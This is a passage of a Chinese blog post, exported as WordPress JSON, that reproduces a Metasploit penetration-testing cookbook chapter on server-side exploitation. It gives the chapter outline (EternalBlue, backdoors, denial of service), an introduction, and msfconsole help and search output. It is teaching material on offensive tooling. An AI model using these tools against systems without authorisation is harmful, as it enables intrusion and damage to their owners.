﻿{"id":491,"date":"2020-08-05T00:25:56","date_gmt":"2020-08-04T16:25:56","guid":{"rendered":"https:\/\/byy3.com\/?p=491"},"modified":"2020-08-05T00:25:56","modified_gmt":"2020-08-04T16:25:56","slug":"metasploit-%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95%e6%89%8b%e5%86%8c%e7%ac%ac%e4%b8%89%e7%89%88-%e7%ac%ac%e4%b8%89%e7%ab%a0-%e6%9c%8d%e5%8a%a1%e7%ab%af%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8-%e5%ae%9e","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=491","title":{"rendered":"Metasploit \u6e17\u900f\u6d4b\u8bd5\u624b\u518c\u7b2c\u4e09\u7248 \u7b2c\u4e09\u7ae0 \u670d\u52a1\u7aef\u6f0f\u6d1e\u5229\u7528 \u5b9e\u4f8b"},"content":{"rendered":"<h3 class=\"heading\">\u7b2c\u4e09\u7ae0 \u670d\u52a1\u7aef\u6f0f\u6d1e\u5229\u7528<\/h3>\n<p>\u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u5b66\u4e60\u4ee5\u4e0b\u5185\u5bb9<\/p>\n<p>1\u3001\u653b\u51fbLinux\u670d\u52a1\u5668<\/p>\n<p>2\u3001SQL\u6ce8\u5165\u653b\u51fb<\/p>\n<p>3\u3001shell\u7c7b\u578b<\/p>\n<p>4\u3001\u653b\u51fbWindows\u670d\u52a1\u5668<\/p>\n<p>5\u3001\u5229\u7528\u516c\u7528\u670d\u52a1<\/p>\n<p>6\u3001MS17-010 \u6c38\u6052\u4e4b\u84dd SMB\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cWindows\u5185\u6838\u7834\u574f<\/p>\n<p>7\u3001MS17-010 EternalRomance\/EternalSynergy\/EternalChampion<\/p>\n<p>8\u3001\u690d\u5165\u540e\u95e8<\/p>\n<p>9\u3001\u62d2\u7edd\u670d\u52a1\u653b\u51fb<\/p>\n<h4 class=\"heading\">\u7b80\u4ecb<\/h4>\n<p>\u5728\u7b2c\u4e8c\u7ae0\u7684\u4fe1\u606f\u6536\u96c6\u548c\u626b\u63cf\u4e2d\uff0c\u6211\u4eec\u6536\u96c6\u4e86\u76ee\u6807\u7684IP\u5730\u5740\uff0c\u7aef\u53e3\uff0c\u670d\u52a1\uff0c\u64cd\u4f5c\u7cfb\u7edf\u7b49\u4fe1\u606f\u3002\u4fe1\u606f\u6536\u96c6\u8fc7\u7a0b\u4e2d\u6700\u5927\u7684\u6536\u83b7\u662f\u670d\u52a1\u5668\u6216\u7cfb\u7edf\u7684\u64cd\u4f5c\u7cfb\u7edf\u4fe1\u606f\u3002\u8fd9\u4e9b\u4fe1\u606f\u5bf9\u540e\u7eed\u7684\u6e17\u900f\u76ee\u6807\u673a\u5668\u975e\u5e38\u6709\u7528\uff0c\u56e0\u4e3a\u6211\u4eec\u53ef\u4ee5\u5feb\u901f\u67e5\u627e\u7cfb\u7edf\u4e0a\u8fd0\u884c\u7684\u670d\u52a1\u548c\u6f0f\u6d1e\u4fe1\u606f\u3002\u8fd9\u4e2a\u8fc7\u7a0b\u6709\u70b9\u590d\u6742\uff0c\u4f46\u662f\u6709\u4e86\u8fd9\u4e9b\u4fe1\u606f\u53ef\u4ee5\u5f88\u5927\u7a0b\u5ea6\u51cf\u8f7b\u6211\u4eec\u540e\u7eed\u7684\u5de5\u4f5c\u3002<\/p>\n<p>\u6bcf\u4e00\u4e2a\u64cd\u4f5c\u7cfb\u7edf\u90fd\u5b58\u5728\u4e00\u4e9b\u7f3a\u9677\u3002\u4e00\u65e6\u6f0f\u6d1e\u88ab\u62a5\u544a\u51fa\u6765\uff0c\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\u5f00\u53d1\u4e5f\u5f00\u59cb\u4e86\u3002\u83b7\u5f97\u8bb8\u53ef\u7684\u64cd\u4f5c\u7cfb\u7edf\uff0c\u6bd4\u5982Windows\uff0c\u53ef\u4ee5\u5f88\u5feb\u4e3a\u6f0f\u6d1e\u6216BUG\u5f00\u53d1\u8865\u4e01\u7a0b\u5e8f\uff0c\u5e76\u63a8\u9001\u7ed9\u7528\u6237\u66f4\u65b0\u3002\u6f0f\u6d1e\u62ab\u9732\u662f\u4e00\u4e2a\u4e25\u91cd\u7684\u95ee\u9898\uff0c\u7279\u522b\u662f 0day \u6f0f\u6d1e\u4f1a\u5bf9\u8ba1\u7b97\u673a\u884c\u4e1a\u9020\u6210\u4e25\u91cd\u7834\u574f\u30020day \u6536\u5230\u9ad8\u5ea6\u8ffd\u6367\uff0c\u5728\u5e02\u573a\u4e0a\u7684\u4ef7\u683c\u53ef\u8fbe 15000\u7f8e\u5143\u52301000000\u7f8e\u5143\u3002\u6f0f\u6d1e\u88ab\u53d1\u73b0\u5e76\u88ab\u5229\u7528\uff0c\u4f46\u6f0f\u6d1e\u7684\u62ab\u9732\u53d6\u51b3\u4e8e\u7814\u7a76\u4eba\u5458\u53ca\u5176\u610f\u56fe\u3002<\/p>\n<p>\u50cf\u5fae\u8f6f\u3001\u82f9\u679c\u548c\u8c37\u6b4c\u8fd9\u6837\u7684\u77e5\u540d\u4f01\u4e1a\u4f1a\u5b9a\u671f\u4e3a\u4ed6\u4eec\u7684\u4ea7\u54c1\u53d1\u5e03\u8865\u4e01\uff0c\u56e0\u4e3a\u4ed6\u4eec\u8981\u4e3a\u4f17\u591a\u7684\u7528\u6237\u8d1f\u8d23\u3002\u4f46\u5728\u516c\u53f8\u573a\u666f\u4e2d\uff0c\u60c5\u51b5\u4f1a\u53d8\u5f97\u66f4\u7cdf\uff0c\u7531\u4e8e\u6d89\u53ca\u505c\u673a\u65f6\u95f4\u548c\u786e\u4fdd\u4e1a\u52a1\u8fde\u7eed\u6027\u4e0d\u53d7\u5f71\u54cd\uff0c\u670d\u52a1\u5668\u9700\u8981\u6570\u5468\u624d\u80fd\u4fee\u8865\u3002\u56e0\u6b64\uff0c\u5efa\u8bae\u60a8\u66f4\u65b0\u6216\u5bc6\u5207\u5173\u6ce8\u6b63\u5728\u4f7f\u7528\u7684\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u53d1\u73b0\u7684\u4efb\u4f55\u6700\u65b0\u6f0f\u6d1e\u3002\u672a\u4fee\u8865\u7684\u7cfb\u7edf\u662f\u9ed1\u5ba2\u7684\u6700\u7231\uff0c\u56e0\u4e3a\u4ed6\u4eec\u4f1a\u7acb\u5373\u53d1\u52a8\u653b\u51fb\uff0c\u5371\u53ca\u76ee\u6807\u3002\u56e0\u6b64\uff0c\u5fc5\u987b\u5b9a\u671f\u4fee\u8865\u548c\u66f4\u65b0\u64cd\u4f5c\u7cfb\u7edf\u3002\u5728\u672c\u7ae0\u4e2d\uff0c\u6211\u4eec\u5c06\u91cd\u70b9\u8ba8\u8bba\u4e00\u4e9b\u6700\u6d41\u884c\u7684\u670d\u52a1\u548c\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u62a5\u544a\u7684\u6f0f\u6d1e\u3002<\/p>\n<p>\u5728\u6e17\u900f\u6d4b\u8bd5\u7684\u8fc7\u7a0b\u4e2d\uff0c\u4e00\u65e6\u76ee\u6807\u64cd\u4f5c\u7cfb\u7edf\u7684\u4fe1\u606f\u53ef\u7528\uff0c\u6e17\u900f\u4eba\u5458\u5c31\u5f00\u59cb\u5bfb\u627e\u9488\u5bf9\u7279\u5b9a\u670d\u52a1\u6216\u64cd\u4f5c\u7cfb\u7edf\u6f0f\u6d1e\u7684\u53ef\u5229\u7528\u7a0b\u5e8f\u3002\u56e0\u6b64\uff0c\u672c\u7ae0\u5c06\u662f\u6211\u4eec\u6df1\u5165\u4e86\u89e3\u76ee\u6807\u670d\u52a1\u5668\u7aef\u6f0f\u6d1e\u7684\u7b2c\u4e00\u6b65\u3002\u6211\u4eec\u5c06\u91cd\u70b9\u4ecb\u7ecd\u4e00\u4e9b\u4f7f\u7528\u5e7f\u6cdb\u7684windows\u64cd\u4f5c\u7cfb\u7edf\u548cLinux\u64cd\u4f5c\u7cfb\u7edf\u3002\u6211\u4eec\u8fd8\u5c06\u7814\u7a76\u5982\u4f55\u4f7f\u7528\u5229\u7528\u8fd9\u4e9b\u6f0f\u6d1e\uff0c\u5e76\u8bbe\u7f6e\u5b83\u4eec\u7684\u53c2\u6570\uff0c\u4f7f\u5b83\u4eec\u80fd\u591f\u5728\u76ee\u6807\u673a\u5668\u4e0a\u6267\u884c\u3002\u6700\u540e\uff0c\u6211\u4eec\u5c06\u8ba8\u8bba Metasploit \u6846\u67b6\u4e2d\u7684\u653b\u51fb\u8f7d\u8377(payloads)\u3002<\/p>\n<p>\u5728\u5bf9\u76ee\u6807\u673a\u5668\u653b\u51fb\u5229\u7528\u4e4b\u524d\uff0c\u6211\u4eec\u9996\u5148\u8981\u77e5\u9053\u4e00\u4e9b\u5173\u4e8e\u653b\u51fb\u6a21\u5757\u548c\u653b\u51fb\u8f7d\u8377\u7684\u57fa\u7840\u77e5\u8bc6\uff0c\u6bd4\u5982\u5982\u4f55\u8bbe\u7f6e\u53c2\u6570\u7b49\u3002<\/p>\n<p>\u4e3a\u4e86\u5bf9\u76ee\u6807\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u653b\u51fb\uff0c\u9996\u5148\u9700\u8981\u626b\u63cf\u76ee\u6807\u7684\u7aef\u53e3\u548c\u670d\u52a1\uff0c\u4e00\u65e6\u6536\u96c6\u4e86\u8db3\u591f\u591a\u7684\u4fe1\u606f\uff0c\u4e0b\u4e00\u6b65\u5c31\u662f\u9009\u62e9\u76f8\u5bf9\u5e94\u7684\u6f0f\u6d1e\u5229\u7528\u7a0b\u5e8f\u5bf9\u76ee\u6807\u8fdb\u884c\u653b\u51fb\u3002\u8ba9\u6211\u4eec\u6765\u5b66\u4e60\u4e00\u4e9b\u00a0<code>msfconsole<\/code>\u4e2d\u7684\u6f0f\u6d1e\u5229\u7528\u547d\u4ee4\u3002<\/p>\n<p>\u5173\u4e8e\u00a0<code>msfconsole<\/code>\u00a0\u548c\u5982\u4f55\u542f\u52a8\u00a0<code>msfconsole<\/code>\u00a0\uff0c\u5728\u6211\u4eec\u4e4b\u524d\u7684\u7ae0\u8282\u5df2\u7ecf\u8bb2\u89e3\u8fc7\u4e86\u3002<\/p>\n<p>\u5728<code>msfconsole<\/code>\u00a0\u4e2d\uff0c\u5982\u679c\u8981\u67e5\u770b\u5e2e\u52a9\uff0c\u53ef\u4ee5\u76f4\u63a5\u8f93\u5165\u00a0<code>help<\/code>\u00a0\u547d\u4ee4\u5373\u53ef<\/p>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 &gt; help<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Core Commands<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">=============<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Command Description<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">------- -----------<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">? Help menu<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">banner Display an awesome metasploit banner<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">cd Change the current working directory<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">color Toggle color<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">connect Communicate <span class=\"hljs-keyword\">with<\/span> a host<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">exit<\/span> <span class=\"hljs-keyword\">Exit<\/span> the console<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">get Gets the value <span class=\"hljs-keyword\">of<\/span> a context-specific variable<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">getg Gets the value <span class=\"hljs-keyword\">of<\/span> a global variable<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">grep Grep the output <span class=\"hljs-keyword\">of<\/span> another command<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">help Help menu<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">history Show command history<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">load Load a framework plugin<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">quit <span class=\"hljs-keyword\">Exit<\/span> the console<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">repeat<\/span> <span class=\"hljs-keyword\">Repeat<\/span> a list <span class=\"hljs-keyword\">of<\/span> commands<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">route Route traffic through a session<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">save Saves the active datastores<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">sessions Dump session listings <span class=\"hljs-keyword\">and<\/span> display information about session<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">set<\/span> Sets a context-specific variable <span class=\"hljs-keyword\">to<\/span> a value<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">setg Sets a global variable <span class=\"hljs-keyword\">to<\/span> a value<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">sleep <span class=\"hljs-keyword\">Do<\/span> nothing <span class=\"hljs-keyword\">for<\/span> the specified number <span class=\"hljs-keyword\">of<\/span> seconds<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">spool <span class=\"hljs-keyword\">Write<\/span> console output into a <span class=\"hljs-keyword\">file<\/span> <span class=\"hljs-keyword\">as<\/span> well the screen<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">threads View <span class=\"hljs-keyword\">and<\/span> manipulate background threads<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">....<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">set<\/span> RHOSTS fe80::<span class=\"hljs-number\">3990<\/span>:<span class=\"hljs-number\">0000<\/span>\/<span class=\"hljs-number\">110<\/span>, ::<span class=\"hljs-number\">1<\/span>-::f0f0<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">Target a block from a resolved domain <span class=\"hljs-keyword\">name<\/span>:<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"35\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-keyword\">set<\/span> RHOSTS www.example.test\/<span class=\"hljs-number\">24<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"36\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"37\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable delphi\"><\/code><\/pre>\n<p>\u4ece\u8f93\u51fa\u7ed3\u679c\u6765\u770b\uff0c\u6709\u8bb8\u591a\u7684\u547d\u4ee4\uff0c\u4f60\u53ef\u80fd\u4f1a\u88ab\u5413\u5230\u3002\u4f46\u4e4b\u524d\u6211\u4eec\u5df2\u7ecf\u4e86\u89e3\u4e86\u4e00\u4e9b\u547d\u4ee4\uff0c\u6bd4\u5982\u6570\u636e\u5e93\u547d\u4ee4\u3002\u73b0\u5728\u6211\u4eec\u5c06\u91cd\u70b9\u5173\u6ce8\u5728\u6f0f\u6d1e\u5229\u7528\u9636\u6bb5\u6700\u6709\u7528\u7684\u547d\u4ee4\uff0c\u5e76\u5728\u8fc7\u7a0b\u4e2d\u4e86\u89e3\u5176\u4ed6\u547d\u4ee4\u3002<\/p>\n<p>\u6700\u6709\u7528\u7684\u547d\u4ee4\uff1a<code>search<\/code>\u547d\u4ee4<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 &gt; search -h<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Usage:<\/span> search [ options ] &lt;keywords&gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">OPTIONS:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-h Show <span class=\"hljs-built_in\">this<\/span> help information<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-o &lt;file&gt; Send output to a file <span class=\"hljs-keyword\">in<\/span> csv format<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-S &lt;string&gt; Search string <span class=\"hljs-keyword\">for<\/span> row filter<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">-u Use module <span class=\"hljs-keyword\">if<\/span> there is one result<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Keywords:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">aka :<\/span> Modules with a matching AKA (also-known-<span class=\"hljs-keyword\">as<\/span>) name<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">author :<\/span> Modules written by <span class=\"hljs-built_in\">this<\/span> author<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">arch :<\/span> Modules affecting <span class=\"hljs-built_in\">this<\/span> architecture<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">bid :<\/span> Modules with a matching Bugtraq ID<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">cve :<\/span> Modules with a matching CVE ID<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">edb :<\/span> Modules with a matching Exploit-DB ID<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">check :<\/span> Modules that support the <span class=\"hljs-string\">'check'<\/span> method<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">date :<\/span> Modules with a matching disclosure date<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">description :<\/span> Modules with a matching description<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">full_name :<\/span> Modules with a matching full name<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span 